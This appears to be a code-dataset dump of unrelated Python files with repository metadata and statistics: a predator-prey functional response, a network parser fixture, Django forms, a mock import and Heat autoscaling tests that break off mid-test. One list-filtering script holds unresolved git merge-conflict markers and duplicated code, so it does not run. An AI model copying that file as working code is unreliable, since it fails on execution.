return (Constants.PREDATION_RATE_PER_UNIT_OF_TIME * number_of_preys * number_of_predators) / (1 + Constants.PREDATION_RATE_PER_UNIT_OF_TIME * Constants.CAPTURE_TIME * number_of_preys)
def hollingIIIFunctionalResponse(number_of_preys:float, number_of_predators:float):
return (Constants.PREDATION_RATE_PER_UNIT_OF_TIME * number_of_preys ** 2 * number_of_predators) / (1 + Constants.PREDATION_RATE_PER_UNIT_OF_TIME * Constants.CAPTURE_TIME * number_of_preys ** 2)
| 49.822785
| 273
| 0.834604
| 525
| 3,936
| 5.771429
| 0.100952
| 0.211221
| 0.163036
| 0.077228
| 0.830693
| 0.828713
| 0.828713
| 0.827723
| 0.827723
| 0.782178
| 0
| 0.004197
| 0.091972
| 3,936
| 79
| 274
| 49.822785
| 0.843593
| 0.368902
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.464286
| false
| 0
| 0.071429
| 0.464286
| 1
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 10
|
7f4b57d5321d450f9a6f6a05230c7f810785d248
| 5,348
|
py
|
Python
|
src/genie/libs/parser/iosxe/tests/ShowSegmentRoutingTrafficEngTopology/cli/equal/golden_output_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 204
|
2018-06-27T00:55:27.000Z
|
2022-03-06T21:12:18.000Z
|
src/genie/libs/parser/iosxe/tests/ShowSegmentRoutingTrafficEngTopology/cli/equal/golden_output_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 468
|
2018-06-19T00:33:18.000Z
|
2022-03-31T23:23:35.000Z
|
src/genie/libs/parser/iosxe/tests/ShowSegmentRoutingTrafficEngTopology/cli/equal/golden_output_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 309
|
2019-01-16T20:21:07.000Z
|
2022-03-30T12:56:41.000Z
|
expected_output = {
"nodes": {
1: {
"ospf_router_id": "10.19.198.239",
"area_id": 8,
"domain_id": 0,
"asn": 65109,
"prefix_sid": {
"prefix": "10.19.198.239",
"label": 16073,
"label_type": "regular",
"domain_id": 0,
"flags": "N , E",
},
"links": {
0: {
"local_address": "10.19.198.26",
"remote_address": "10.19.198.25",
"local_node": {
"ospf_router_id": "10.19.198.239",
"area_id": 8,
"domain_id": 0,
"asn": 65109,
},
"remote_node": {
"ospf_router_id": "10.189.5.252",
"area_id": 8,
"domain_id": 0,
"asn": 65109,
},
"metric": {"igp": 1000, "te": 1000, "delay": 1000},
"bandwidth_total": 125000000,
"bandwidth_reservable": 0,
"admin_groups": "0x00000000",
"adj_sid": {"18": "unprotected", "36": "protected"},
},
1: {
"local_address": "10.19.198.30",
"remote_address": "10.19.198.29",
"local_node": {
"ospf_router_id": "10.19.198.239",
"area_id": 8,
"domain_id": 0,
"asn": 65109,
},
"remote_node": {
"ospf_router_id": "10.189.5.253",
"area_id": 8,
"domain_id": 0,
"asn": 65109,
},
"metric": {"igp": 1000, "te": 1000, "delay": 1000},
"bandwidth_total": 125000000,
"bandwidth_reservable": 0,
"admin_groups": "0x00000000",
"adj_sid": {"37": "unprotected", "38": "protected"},
},
},
},
2: {
"ospf_router_id": "10.189.5.252",
"area_id": 8,
"domain_id": 0,
"asn": 65109,
"prefix_sid": {
"prefix": "10.189.5.252",
"label": 16071,
"label_type": "regular",
"domain_id": 0,
"flags": "N",
},
"links": {
0: {
"local_address": "10.19.198.25",
"remote_address": "10.19.198.26",
"local_node": {
"ospf_router_id": "10.189.5.252",
"area_id": 8,
"domain_id": 0,
"asn": 65109,
},
"remote_node": {
"ospf_router_id": "10.19.198.239",
"area_id": 8,
"domain_id": 0,
"asn": 65109,
},
"metric": {"igp": 1000, "te": 1000, "delay": 1000},
"bandwidth_total": 125000000,
"bandwidth_reservable": 125000000,
"admin_groups": "0x00000000",
"adj_sid": {"24": "protected"},
},
1: {
"local_address": "10.169.14.122",
"remote_address": "10.169.14.121",
"local_node": {
"ospf_router_id": "10.189.5.252",
"area_id": 8,
"domain_id": 0,
"asn": 65109,
},
"remote_node": {
"ospf_router_id": "10.169.14.240",
"area_id": 8,
"domain_id": 0,
"asn": 65109,
},
"metric": {"igp": 100, "te": 100, "delay": 100},
"bandwidth_total": 125000000,
"bandwidth_reservable": 125000000,
"admin_groups": "0x00000000",
"adj_sid": {"16": "protected"},
},
2: {
"local_address": "10.189.5.93",
"remote_address": "10.189.5.94",
"local_node": {
"ospf_router_id": "10.189.5.252",
"area_id": 8,
"domain_id": 0,
"asn": 65109,
},
"remote_node": {
"ospf_router_id": "10.189.5.253",
"area_id": 8,
"domain_id": 0,
"asn": 65109,
},
"metric": {"igp": 5, "te": 5, "delay": 5},
"bandwidth_total": 125000000,
"bandwidth_reservable": 125000000,
"admin_groups": "0x00000000",
"adj_sid": {"19": "protected"},
},
},
},
}
}
| 38.2
| 72
| 0.318063
| 411
| 5,348
| 3.907543
| 0.170316
| 0.069738
| 0.078456
| 0.104608
| 0.856164
| 0.780822
| 0.780822
| 0.749689
| 0.711083
| 0.711083
| 0
| 0.207038
| 0.543007
| 5,348
| 139
| 73
| 38.47482
| 0.450082
| 0
| 0
| 0.647482
| 0
| 0
| 0.28721
| 0
| 0
| 0
| 0.009349
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
f6c71a9c8857036356d792c6b8870e6cc2cf4fe4
| 751
|
py
|
Python
|
positve and negative.py
|
sxd7/p_ython
|
b215a63e4da541b5850b57b16e582b4e20940e6e
|
[
"MIT"
] | null | null | null |
positve and negative.py
|
sxd7/p_ython
|
b215a63e4da541b5850b57b16e582b4e20940e6e
|
[
"MIT"
] | null | null | null |
positve and negative.py
|
sxd7/p_ython
|
b215a63e4da541b5850b57b16e582b4e20940e6e
|
[
"MIT"
] | null | null | null |
<<<<<<< HEAD
list1 = [12,-7,5,64,-14]
print("original numbers in the list:",list1)
new_list1 = list(filter(lambda x: x>=0,list1))
print("positive numbers in the list:",new_list1)
list2 = [12,14,-95,3]
print("original numbers in the list:",list2)
new_list2 = list(filter(lambda x: x>=0,list2))
print("positive numbers in the list:",new_list2)
=======
list1 = [12,-7,5,64,-14]
print("original numbers in the list:",list1)
new_list1 = list(filter(lambda x: x>=0,list1))
print("positive numbers in the list:",new_list1)
list2 = [12,14,-95,3]
print("original numbers in the list:",list2)
new_list2 = list(filter(lambda x: x>=0,list2))
print("positive numbers in the list:",new_list2)
>>>>>>> c0f371898224bab1f694fd7de19b6f88ea9d6a0b
| 28.884615
| 49
| 0.684421
| 120
| 751
| 4.216667
| 0.191667
| 0.142292
| 0.189723
| 0.252964
| 0.913043
| 0.913043
| 0.913043
| 0.913043
| 0.913043
| 0.913043
| 0
| 0.11828
| 0.133156
| 751
| 25
| 50
| 30.04
| 0.658986
| 0
| 0
| 0.842105
| 0
| 0
| 0.313514
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.421053
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 11
|
10070252e6683d7dcc73ac484dfcdf953fd04880
| 178
|
py
|
Python
|
tests/testapp/sixmock.py
|
douleutaras/django-performance-testing
|
62e230441d9c662cbc81888555614135d03063c1
|
[
"BSD-3-Clause"
] | 66
|
2016-09-17T10:44:01.000Z
|
2021-04-30T14:18:08.000Z
|
tests/testapp/sixmock.py
|
PaesslerAG/django-performance-testing
|
62e230441d9c662cbc81888555614135d03063c1
|
[
"BSD-3-Clause"
] | 21
|
2016-10-04T11:31:53.000Z
|
2019-07-25T16:16:17.000Z
|
tests/testapp/sixmock.py
|
douleutaras/django-performance-testing
|
62e230441d9c662cbc81888555614135d03063c1
|
[
"BSD-3-Clause"
] | 9
|
2016-10-10T07:07:30.000Z
|
2020-01-03T21:11:44.000Z
|
try:
from unittest.mock import patch, Mock, PropertyMock, MagicMock # noqa: E501
except ImportError:
from mock import patch, Mock, PropertyMock, MagicMock # noqa: F401
| 35.6
| 80
| 0.741573
| 22
| 178
| 6
| 0.590909
| 0.151515
| 0.227273
| 0.287879
| 0.666667
| 0.666667
| 0.666667
| 0
| 0
| 0
| 0
| 0.041379
| 0.185393
| 178
| 4
| 81
| 44.5
| 0.868966
| 0.117978
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1201f15319d9ec46c8bc0a93658cd7b05a649fe3
| 5,483
|
py
|
Python
|
carrara/archivi/forms.py
|
cxc61cxc/django_prove
|
9df58be73ef51e13287bfbd1b8623f3f39b8a224
|
[
"MIT"
] | null | null | null |
carrara/archivi/forms.py
|
cxc61cxc/django_prove
|
9df58be73ef51e13287bfbd1b8623f3f39b8a224
|
[
"MIT"
] | null | null | null |
carrara/archivi/forms.py
|
cxc61cxc/django_prove
|
9df58be73ef51e13287bfbd1b8623f3f39b8a224
|
[
"MIT"
] | null | null | null |
from django import forms
from django.forms import ModelForm
from .models import Pratica
class PraticaAdd(forms.ModelForm):
class Meta:
model = Pratica
fields = ('__all__')
widgets = {
'origine' : forms.TextInput(attrs={'class':'form-control'}),
'tipo' : forms.TextInput(attrs={'class':'form-control'}),
'istruttoria' : forms.TextInput(attrs={'class':'form-control'}),
'pos' : forms.TextInput(attrs={'class':'form-control'}),
'data_prot_gen' : forms.DateInput(),
'prot_gen' : forms.TextInput(attrs={'class':'form-control'}),
'prot_urb' : forms.TextInput(attrs={'class':'form-control'}),
'num_atto' : forms.TextInput(attrs={'class':'form-control'}),
'data_atto' : forms.DateInput(),
'atto' : forms.TextInput(attrs={'class':'form-control'}),
'richiedente' : forms.TextInput(attrs={'class':'form-control','autofocus': True}),
'l_nasc' : forms.TextInput(attrs={'class':'form-control'}),
'd_nasc' : forms.DateInput(),
'citta' : forms.TextInput(attrs={'class':'form-control'}),
'residenza' : forms.TextInput(attrs={'class':'form-control'}),
'cod_fisc' : forms.TextInput(attrs={'class':'form-control'}),
'oggetto' : forms.Textarea(attrs={'class':'form-control', 'rows':2, 'cols':15}),
'ubicazione' : forms.TextInput(attrs={'class':'form-control'}),
'fg' : forms.TextInput(attrs={'class':'form-control'}),
'mapp' : forms.TextInput(attrs={'class':'form-control'}),
'com_edil' : forms.TextInput(attrs={'class':'form-control'}),
'data_ce' : forms.DateInput(),
'tecnico' : forms.TextInput(attrs={'class':'form-control'}),
}
class DateInput(forms.DateInput):
input_type = 'date'
class RichiedenteForm(forms.ModelForm):
class Meta:
model = Pratica
fields = ('richiedente',)
class MappaleForm(forms.ModelForm):
class Meta:
model = Pratica
fields = ('fg','mapp',)
class TitoloForm(forms.ModelForm):
class Meta:
model = Pratica
fields = ('atto',)
class IndirizzoForm(forms.ModelForm):
civico = forms.CharField(
widget=forms.TextInput(attrs={'readonly':'readonly'})
)
class Meta:
model = Pratica
fields = ('ubicazione',)
class PraticaRegistration(forms.ModelForm):
class Meta:
model = Pratica
fields = ('__all__')
widgets = {
'origine' : forms.TextInput(attrs={'class':'form-control'}),
'tipo' : forms.TextInput(attrs={'class':'form-control'}),
'istruttoria' : forms.TextInput(attrs={'class':'form-control'}),
'pos' : forms.TextInput(attrs={'class':'form-control'}),
'data_prot_gen' : forms.DateInput(),
'prot_gen' : forms.TextInput(attrs={'class':'form-control'}),
'prot_urb' : forms.TextInput(attrs={'class':'form-control'}),
'num_atto' : forms.TextInput(attrs={'class':'form-control'}),
'data_atto' : forms.DateInput(),
'atto' : forms.TextInput(attrs={'class':'form-control'}),
'richiedente' : forms.TextInput(attrs={'class':'form-control','autofocus': True}),
'l_nasc' : forms.TextInput(attrs={'class':'form-control'}),
'd_nasc' : forms.DateInput(),
'citta' : forms.TextInput(attrs={'class':'form-control'}),
'residenza' : forms.TextInput(attrs={'class':'form-control'}),
'cod_fisc' : forms.TextInput(attrs={'class':'form-control'}),
'oggetto' : forms.Textarea(attrs={'class':'form-control', 'rows':2, 'cols':15}),
'ubicazione' : forms.TextInput(attrs={'class':'form-control'}),
'fg' : forms.TextInput(attrs={'class':'form-control'}),
'mapp' : forms.TextInput(attrs={'class':'form-control'}),
'com_edil' : forms.TextInput(attrs={'class':'form-control'}),
'data_ce' : forms.DateInput(),
'tecnico' : forms.TextInput(attrs={'class':'form-control'}),
}
class PraticaDetail(forms.ModelForm):
class Meta:
model = Pratica
fields = ('__all__')
'''
class AllegatoAdd(forms.ModelForm):
class Meta:
model = Allegato
fields = ('nome','doc',)
widgets = {
'nome' : forms.TextInput(attrs={'class':'form-control', 'required':True}),
'doc' : forms.FileInput(attrs={'class':'form-control'}),
'pratica' : forms.HiddenInput(),
}
class ContactForm(forms.Form):
from_email = forms.EmailField(required=True)
subject = forms.CharField(required=True)
message = forms.CharField(widget=forms.Textarea, required=True)
'''
| 37.813793
| 104
| 0.511581
| 480
| 5,483
| 5.76875
| 0.160417
| 0.144456
| 0.202239
| 0.303359
| 0.781871
| 0.762008
| 0.749368
| 0.704948
| 0.689057
| 0.689057
| 0
| 0.001623
| 0.325734
| 5,483
| 144
| 105
| 38.076389
| 0.747363
| 0
| 0
| 0.755814
| 0
| 0
| 0.221676
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.034884
| 0
| 0.232558
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
122b0e425201a5525e0e9ee06bb0586ff0fef20f
| 56,983
|
py
|
Python
|
heat/tests/test_autoscaling.py
|
citrix-openstack-build/heat
|
fa31873529481472e037e3ce157b87f8057fe622
|
[
"Apache-2.0"
] | null | null | null |
heat/tests/test_autoscaling.py
|
citrix-openstack-build/heat
|
fa31873529481472e037e3ce157b87f8057fe622
|
[
"Apache-2.0"
] | null | null | null |
heat/tests/test_autoscaling.py
|
citrix-openstack-build/heat
|
fa31873529481472e037e3ce157b87f8057fe622
|
[
"Apache-2.0"
] | null | null | null |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import copy
import mox
from testtools import skipIf
from oslo.config import cfg
from heat.common import template_format
from heat.common import exception
from heat.engine.resources import autoscaling as asc
from heat.engine.resources import loadbalancer
from heat.engine.resources import instance
from heat.engine.resources.neutron import loadbalancer as neutron_lb
from heat.engine import parser
from heat.engine import resource
from heat.engine import scheduler
from heat.engine.resource import Metadata
from heat.openstack.common import timeutils
from heat.openstack.common.importutils import try_import
from heat.tests.common import HeatTestCase
from heat.tests import fakes
from heat.tests import utils
neutronclient = try_import('neutronclient.v2_0.client')
as_template = '''
{
"AWSTemplateFormatVersion" : "2010-09-09",
"Description" : "AutoScaling Test",
"Parameters" : {
"ImageId": {"Type": "String"},
"KeyName": {"Type": "String"}
},
"Resources" : {
"WebServerGroup" : {
"Type" : "AWS::AutoScaling::AutoScalingGroup",
"Properties" : {
"AvailabilityZones" : ["nova"],
"LaunchConfigurationName" : { "Ref" : "LaunchConfig" },
"MinSize" : "1",
"MaxSize" : "5",
"LoadBalancerNames" : [ { "Ref" : "ElasticLoadBalancer" } ]
}
},
"WebServerScaleUpPolicy" : {
"Type" : "AWS::AutoScaling::ScalingPolicy",
"Properties" : {
"AdjustmentType" : "ChangeInCapacity",
"AutoScalingGroupName" : { "Ref" : "WebServerGroup" },
"Cooldown" : "60",
"ScalingAdjustment" : "1"
}
},
"WebServerScaleDownPolicy" : {
"Type" : "AWS::AutoScaling::ScalingPolicy",
"Properties" : {
"AdjustmentType" : "ChangeInCapacity",
"AutoScalingGroupName" : { "Ref" : "WebServerGroup" },
"Cooldown" : "60",
"ScalingAdjustment" : "-1"
}
},
"ElasticLoadBalancer" : {
"Type" : "AWS::ElasticLoadBalancing::LoadBalancer",
"Properties" : {
"AvailabilityZones" : ["nova"],
"Listeners" : [ {
"LoadBalancerPort" : "80",
"InstancePort" : "80",
"Protocol" : "HTTP"
}]
}
},
"LaunchConfig" : {
"Type" : "AWS::AutoScaling::LaunchConfiguration",
"Properties": {
"ImageId" : {"Ref": "ImageId"},
"InstanceType" : "bar",
}
}
}
}
'''
class AutoScalingTest(HeatTestCase):
dummy_instance_id = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
params = {'KeyName': 'test', 'ImageId': 'foo'}
def setUp(self):
super(AutoScalingTest, self).setUp()
utils.setup_dummy_db()
cfg.CONF.set_default('heat_waitcondition_server_url',
'http://server.test:8000/v1/waitcondition')
self.fc = fakes.FakeKeystoneClient()
def create_scaling_group(self, t, stack, resource_name):
# create the launch configuration resource
conf = stack.resources['LaunchConfig']
self.assertEqual(None, conf.validate())
scheduler.TaskRunner(conf.create)()
self.assertEqual((conf.CREATE, conf.COMPLETE), conf.state)
# create the group resource
rsrc = stack.resources[resource_name]
self.assertEqual(None, rsrc.validate())
scheduler.TaskRunner(rsrc.create)()
self.assertEqual((rsrc.CREATE, rsrc.COMPLETE), rsrc.state)
return rsrc
def create_scaling_policy(self, t, stack, resource_name):
rsrc = stack.resources[resource_name]
self.assertEqual(None, rsrc.validate())
scheduler.TaskRunner(rsrc.create)()
self.assertEqual((rsrc.CREATE, rsrc.COMPLETE), rsrc.state)
return rsrc
def _stub_validate(self):
self.m.StubOutWithMock(parser.Stack, 'validate')
parser.Stack.validate().MultipleTimes()
def _stub_create(self, num):
self._stub_validate()
self.m.StubOutWithMock(instance.Instance, 'handle_create')
self.m.StubOutWithMock(instance.Instance, 'check_create_complete')
cookie = object()
for x in range(num):
instance.Instance.handle_create().AndReturn(cookie)
instance.Instance.check_create_complete(cookie).AndReturn(False)
instance.Instance.check_create_complete(
cookie).MultipleTimes().AndReturn(True)
def _stub_lb_reload(self, num, unset=True, nochange=False):
expected_list = [self.dummy_instance_id] * num
if unset:
self.m.VerifyAll()
self.m.UnsetStubs()
if num > 0:
self.m.StubOutWithMock(instance.Instance, 'FnGetRefId')
instance.Instance.FnGetRefId().MultipleTimes().AndReturn(
self.dummy_instance_id)
self.m.StubOutWithMock(loadbalancer.LoadBalancer, 'handle_update')
if nochange:
loadbalancer.LoadBalancer.handle_update(
mox.IgnoreArg(), mox.IgnoreArg(), {}).AndReturn(None)
else:
loadbalancer.LoadBalancer.handle_update(
mox.IgnoreArg(), mox.IgnoreArg(),
{'Instances': expected_list}).AndReturn(None)
def _stub_meta_expected(self, now, data, nmeta=1):
# Stop time at now
self.m.StubOutWithMock(timeutils, 'utcnow')
timeutils.utcnow().MultipleTimes().AndReturn(now)
# Then set a stub to ensure the metadata update is as
# expected based on the timestamp and data
self.m.StubOutWithMock(Metadata, '__set__')
expected = {timeutils.strtime(now): data}
# Note for ScalingPolicy, we expect to get a metadata
# update for the policy and autoscaling group, so pass nmeta=2
for x in range(nmeta):
Metadata.__set__(mox.IgnoreArg(), expected).AndReturn(None)
def test_scaling_delete_empty(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['MinSize'] = '0'
properties['MaxSize'] = '0'
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(0)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(None, rsrc.FnGetAtt("InstanceList"))
rsrc.delete()
self.m.VerifyAll()
def test_scaling_adjust_down_empty(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['MinSize'] = '1'
properties['MaxSize'] = '1'
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
# Reduce the min size to 0, should complete without adjusting
update_snippet = copy.deepcopy(rsrc.parsed_template())
update_snippet['Properties']['MinSize'] = '0'
scheduler.TaskRunner(rsrc.update, update_snippet)()
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
# trigger adjustment to reduce to 0, there should be no more instances
self._stub_lb_reload(0)
self._stub_meta_expected(now, 'ChangeInCapacity : -1')
self.m.ReplayAll()
rsrc.adjust(-1)
self.assertEqual([], rsrc.get_instance_names())
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_update_replace(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(utils.PhysName(stack.name, rsrc.name),
rsrc.FnGetRefId())
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
update_snippet = copy.deepcopy(rsrc.parsed_template())
update_snippet['Properties']['AvailabilityZones'] = ['foo']
updater = scheduler.TaskRunner(rsrc.update, update_snippet)
self.assertRaises(resource.UpdateReplace, updater)
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_suspend(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(utils.PhysName(stack.name, rsrc.name),
rsrc.FnGetRefId())
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
self.assertEqual(rsrc.state, (rsrc.CREATE, rsrc.COMPLETE))
self.m.VerifyAll()
self.m.UnsetStubs()
self.m.StubOutWithMock(instance.Instance, 'handle_suspend')
self.m.StubOutWithMock(instance.Instance, 'check_suspend_complete')
inst_cookie = (object(), object(), object())
instance.Instance.handle_suspend().AndReturn(inst_cookie)
instance.Instance.check_suspend_complete(inst_cookie).AndReturn(False)
instance.Instance.check_suspend_complete(inst_cookie).AndReturn(True)
self.m.ReplayAll()
scheduler.TaskRunner(rsrc.suspend)()
self.assertEqual(rsrc.state, (rsrc.SUSPEND, rsrc.COMPLETE))
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_resume(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(utils.PhysName(stack.name, rsrc.name),
rsrc.FnGetRefId())
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
self.assertEqual(rsrc.state, (rsrc.CREATE, rsrc.COMPLETE))
self.m.VerifyAll()
self.m.UnsetStubs()
self.m.StubOutWithMock(instance.Instance, 'handle_resume')
self.m.StubOutWithMock(instance.Instance, 'check_resume_complete')
inst_cookie = (object(), object(), object())
instance.Instance.handle_resume().AndReturn(inst_cookie)
instance.Instance.check_resume_complete(inst_cookie).AndReturn(False)
instance.Instance.check_resume_complete(inst_cookie).AndReturn(True)
self.m.ReplayAll()
rsrc.state_set(rsrc.SUSPEND, rsrc.COMPLETE)
for i in rsrc.nested().resources.values():
i.state_set(rsrc.SUSPEND, rsrc.COMPLETE)
scheduler.TaskRunner(rsrc.resume)()
self.assertEqual(rsrc.state, (rsrc.RESUME, rsrc.COMPLETE))
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_suspend_multiple(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['DesiredCapacity'] = '2'
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(2)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 2')
self._stub_create(2)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(utils.PhysName(stack.name, rsrc.name),
rsrc.FnGetRefId())
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
self.assertEqual(rsrc.state, (rsrc.CREATE, rsrc.COMPLETE))
self.m.VerifyAll()
self.m.UnsetStubs()
self.m.StubOutWithMock(instance.Instance, 'handle_suspend')
self.m.StubOutWithMock(instance.Instance, 'check_suspend_complete')
inst_cookie1 = ('foo1', 'foo2', 'foo3')
inst_cookie2 = ('bar1', 'bar2', 'bar3')
instance.Instance.handle_suspend().InAnyOrder().AndReturn(inst_cookie1)
instance.Instance.handle_suspend().InAnyOrder().AndReturn(inst_cookie2)
instance.Instance.check_suspend_complete(inst_cookie1).InAnyOrder(
).AndReturn(True)
instance.Instance.check_suspend_complete(inst_cookie2).InAnyOrder(
).AndReturn(True)
self.m.ReplayAll()
scheduler.TaskRunner(rsrc.suspend)()
self.assertEqual(rsrc.state, (rsrc.SUSPEND, rsrc.COMPLETE))
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_resume_multiple(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['DesiredCapacity'] = '2'
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(2)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 2')
self._stub_create(2)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(utils.PhysName(stack.name, rsrc.name),
rsrc.FnGetRefId())
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
self.assertEqual(rsrc.state, (rsrc.CREATE, rsrc.COMPLETE))
self.m.VerifyAll()
self.m.UnsetStubs()
self.m.StubOutWithMock(instance.Instance, 'handle_resume')
self.m.StubOutWithMock(instance.Instance, 'check_resume_complete')
inst_cookie1 = ('foo1', 'foo2', 'foo3')
inst_cookie2 = ('bar1', 'bar2', 'bar3')
instance.Instance.handle_resume().InAnyOrder().AndReturn(inst_cookie1)
instance.Instance.handle_resume().InAnyOrder().AndReturn(inst_cookie2)
instance.Instance.check_resume_complete(inst_cookie1).InAnyOrder(
).AndReturn(True)
instance.Instance.check_resume_complete(inst_cookie2).InAnyOrder(
).AndReturn(True)
self.m.ReplayAll()
rsrc.state_set(rsrc.SUSPEND, rsrc.COMPLETE)
for i in rsrc.nested().resources.values():
i.state_set(rsrc.SUSPEND, rsrc.COMPLETE)
scheduler.TaskRunner(rsrc.resume)()
self.assertEqual(rsrc.state, (rsrc.RESUME, rsrc.COMPLETE))
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_suspend_fail(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(utils.PhysName(stack.name, rsrc.name),
rsrc.FnGetRefId())
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
self.assertEqual(rsrc.state, (rsrc.CREATE, rsrc.COMPLETE))
self.m.VerifyAll()
self.m.UnsetStubs()
self.m.StubOutWithMock(instance.Instance, 'handle_suspend')
self.m.StubOutWithMock(instance.Instance, 'check_suspend_complete')
instance.Instance.handle_suspend().AndRaise(Exception('oops'))
self.m.ReplayAll()
sus_task = scheduler.TaskRunner(rsrc.suspend)
self.assertRaises(exception.ResourceFailure, sus_task, ())
self.assertEqual(rsrc.state, (rsrc.SUSPEND, rsrc.FAILED))
self.assertEqual(rsrc.status_reason,
'Error: Resource suspend failed: Exception: oops')
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_resume_fail(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
